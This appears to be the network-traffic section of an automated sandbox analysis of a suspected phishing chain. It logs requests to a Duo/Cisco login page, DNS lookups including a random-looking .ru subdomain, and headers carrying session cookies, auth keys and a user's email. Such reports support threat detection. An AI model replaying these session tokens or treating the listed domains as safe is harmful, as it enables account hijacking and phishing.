Source: global trafficHTTP traffic detected: GET /login/?authkey=AS25IRIE37M5OV09AEPH&scid=4873fe428ab243529767cba103466e46 HTTP/1.1Host: cisco.login.duosecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://cisco.login.duosecurity.com/email_first?authkey=AS0CZS9SWE2DVLOII3YX&scid=4873fe428ab243529767cba103466e46&req-trace-group=0f64bb06ada299a679628de5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
Source: global trafficHTTP traffic detected: GET /static/css/page/login.css?v=8850e HTTP/1.1Host: cisco.login.duosecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://cisco.login.duosecurity.com/login/?authkey=AS25IRIE37M5OV09AEPH&scid=4873fe428ab243529767cba103466e46Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
Source: global trafficHTTP traffic detected: GET /static/js/page/login.js?v=0f15c HTTP/1.1Host: cisco.login.duosecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://cisco.login.duosecurity.com/login/?authkey=AS25IRIE37M5OV09AEPH&scid=4873fe428ab243529767cba103466e46Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
Source: global trafficHTTP traffic detected: GET /static/js/page/login.js?v=0f15c HTTP/1.1Host: cisco.login.duosecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
Source: global trafficHTTP traffic detected: GET /login/ HTTP/1.1Host: cisco.login.duosecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
Source: global trafficHTTP traffic detected: GET /login/ HTTP/1.1Host: cisco.login.duosecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
Source: global trafficHTTP traffic detected: GET /login/ HTTP/1.1Host: cisco.login.duosecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
Source: global trafficHTTP traffic detected: GET /email_first?authkey=ASKAWA9H1311GU747SH0&scid=4873fe428ab243529767cba103466e46&edit=True HTTP/1.1Host: cisco.login.duosecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://cisco.login.duosecurity.com/login/?authkey=AS25IRIE37M5OV09AEPH&scid=4873fe428ab243529767cba103466e46Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
Source: global trafficHTTP traffic detected: GET /static/css/page/email-first.css?v=8132c HTTP/1.1Host: cisco.login.duosecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://cisco.login.duosecurity.com/email_first?authkey=ASKAWA9H1311GU747SH0&scid=4873fe428ab243529767cba103466e46&edit=TrueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.comIf-None-Match: "672e588f-102e9"If-Modified-Since: Fri, 08 Nov 2024 18:29:35 GMT
Source: global trafficHTTP traffic detected: GET /static/shared/lib/jquery/jquery.min.js?v=ff152 HTTP/1.1Host: cisco.login.duosecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"If-None-Match: "672e588f-15d9d"If-Modified-Since: Fri, 08 Nov 2024 18:29:35 GMTsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://cisco.login.duosecurity.com/email_first?authkey=ASKAWA9H1311GU747SH0&scid=4873fe428ab243529767cba103466e46&edit=TrueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
Source: global trafficHTTP traffic detected: GET /static/js/page/email-first.js?v=488d0 HTTP/1.1Host: cisco.login.duosecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"If-None-Match: "672e588f-fbd4d"If-Modified-Since: Fri, 08 Nov 2024 18:29:35 GMTsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://cisco.login.duosecurity.com/email_first?authkey=ASKAWA9H1311GU747SH0&scid=4873fe428ab243529767cba103466e46&edit=TrueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
Source: global trafficHTTP traffic detected: GET /email_first HTTP/1.1Host: cisco.login.duosecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
Source: global trafficHTTP traffic detected: GET /login/?authkey=AS4MUCDO6UZ8IV2XSQBD&scid=4873fe428ab243529767cba103466e46 HTTP/1.1Host: cisco.login.duosecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://cisco.login.duosecurity.com/email_first?authkey=ASKAWA9H1311GU747SH0&scid=4873fe428ab243529767cba103466e46&edit=TrueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
Source: global trafficHTTP traffic detected: GET /static/css/page/login.css?v=8850e HTTP/1.1Host: cisco.login.duosecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://cisco.login.duosecurity.com/login/?authkey=AS4MUCDO6UZ8IV2XSQBD&scid=4873fe428ab243529767cba103466e46Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.comIf-None-Match: "672e588f-106ef"If-Modified-Since: Fri, 08 Nov 2024 18:29:35 GMT
Source: global trafficHTTP traffic detected: GET /static/js/page/login.js?v=0f15c HTTP/1.1Host: cisco.login.duosecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"If-None-Match: "672e588f-d8bed"If-Modified-Since: Fri, 08 Nov 2024 18:29:35 GMTsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://cisco.login.duosecurity.com/login/?authkey=AS4MUCDO6UZ8IV2XSQBD&scid=4873fe428ab243529767cba103466e46Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
Source: global trafficHTTP traffic detected: GET /jugz/ HTTP/1.1Host: plimmerton.org.nzConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.ki
Source: global trafficDNS traffic detected: DNS query: plimmerton.org.nz
Source: global trafficDNS traffic detected: DNS query: supernova.hethantac.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: jvzxo0nqcg4l1coovlpwctdcqgvywe8bgipczfymr9jhs03hab4hzwtc.birsbunh.ru
Source: global trafficDNS traffic detected: DNS query: excel.office.com
Source: global trafficDNS traffic detected: DNS query: www.microsoft365.com
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: sso-dbbfec7f.sso.duosecurity.com
Source: global trafficDNS traffic detected: DNS query: cisco.login.duosecurity.com
Source: global trafficDNS traffic detected: DNS query: ux-asset-commercial.duosecurity.com
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1512118397:1731904877:TnwUrGDVXMUQ2jl9jRbdEbOt6FgQBC_z5tcXttgieII/8e45aa726acf4857/UtKjiU2c7yTs172l3wH9C9r2Jv4xfho8ENvByZh_3Vs-1731908846-1.1.1.1-1ET3XDspxh5uTlHAswN2STjUqCEhAWy6108Zb.RbPav.9Pumy0Tiz2gMRVxyjvOg HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3106sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: UtKjiU2c7yTs172l3wH9C9r2Jv4xfho8ENvByZh_3Vs-1731908846-1.1.1.1-1ET3XDspxh5uTlHAswN2STjUqCEhAWy6108Zb.RbPav.9Pumy0Tiz2gMRVxyjvOgsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ds4t7/0x4AAAAAAAz8LupiazIQW55I/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 05:47:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Age: 5110Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vNF3VZu5q7fgnedemQfg16x%2Fy1s3RtlC8xfOQLUEEY6393on1iQYnZSF924SxtfPPQkJr8OxQQM32MUU3UP8kF9XSf6skODokXPrk9ROO3OhGaNLAK4l9R%2FeMqEMXA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=255&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2178&delivery_rate=12376068&cwnd=251&unsent_bytes=0&cid=e572fb0326957bd4&ts=34&x=0"CF-Cache-Status: HITServer: cloudflareCF-RAY: 8e45aa7a79c8e993-DFWserver-timing: cfL4;desc="?proto=TCP&rtt=1967&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1911&delivery_rate=1428007&cwnd=249&unsent_bytes=0&cid=49b9e42d1c99c6cd&ts=4722&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 05:47:29 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: j6kXpi00bKEXdABYdKnQPJ/KnPolAfJ9qN0=$4uU8MnOP/uTt+Jwocache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8e45aa867ad945f4-DFWalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 05:47:33 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 54F0a5hgnzl+JL8nLO2cu4XKl6wLJ92yaNc=$CFqhbkkFeTrqfz1VServer: cloudflareCF-RAY: 8e45aa9c89c7b78f-DFWalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 05:47:36 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: qDenIu6fPaUTZjm6j/gsuYCz5UjFKEnSC1Y=$EGINC8oyDmNqcEkhServer: cloudflareCF-RAY: 8e45aab1b98a6c44-DFWalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 18 Nov 2024 05:48:27 GMTContent-Type: text/htmlContent-Length: 919Connection: closeX-Cache: Error from cloudfrontVia: 1.1 0baa339c02d06988c65d8623d1b3c6ec.cloudfront.net (CloudFront)X-Amz-Cf-Pop: FRA56-P2X-Amz-Cf-Id: -kS0Ebgj6_i2kQkzEBsIV1wGptySosmGlTNSpVcKyMKfPxAJlcQhjA==
Source: chromecache_210.2.dr, chromecache_216.2.drString found in binary or memory: http://feross.org
Source: chromecache_205.2.dr, chromecache_219.2.drString found in binary or memory: http://knockoutjs.com/
Source: chromecache_205.2.dr, chromecache_219.2.drString found in binary or memory: http://www.opensource.org/licenses/mit-license.php)
Source: chromecache_211.2.dr, chromecache_191.2.drString found in binary or memory: https://duo.com/about/contact
Source: chromecache_205.2.dr, chromecache_210.2.dr, chromecache_198.2.dr, chromecache_219.2.dr, chromecache_216.2.dr, chromecache_221.2.dr, chromecache_235.2.dr, chromecache_220.2.dr, chromecache_193.2.dr, chromecache_229.2.drString found in binary or memory: https://github.com/douglascrockford/JSON-js
Source: chromecache_173.2.dr, chromecache_186.2.drString found in binary or memory: https://login.microsoftonline.com
Source: chromecache_173.2.dr, chromecache_186.2.drString found in binary or memory: https://login.windows-ppe.net
Source: unknownNetwork traffic detected: HTTP traffic on port 55172 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55137 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55197
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55198
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55199
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55193
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55194
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55190
Source: unknownNetwork traffic detected: HTTP traffic on port 55125 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52948 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55211 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55119 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55143 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55160 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55126 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52938
Source: unknownNetwork traffic detected: HTTP traffic on port 52947 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52939
Source: unknownNetwork traffic detected: HTTP traffic on port 52953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55178 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55190 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55142 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52945
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 60717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52946
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52943
Source: unknownNetwork traffic detected: HTTP traffic on port 55148 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55173 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52944
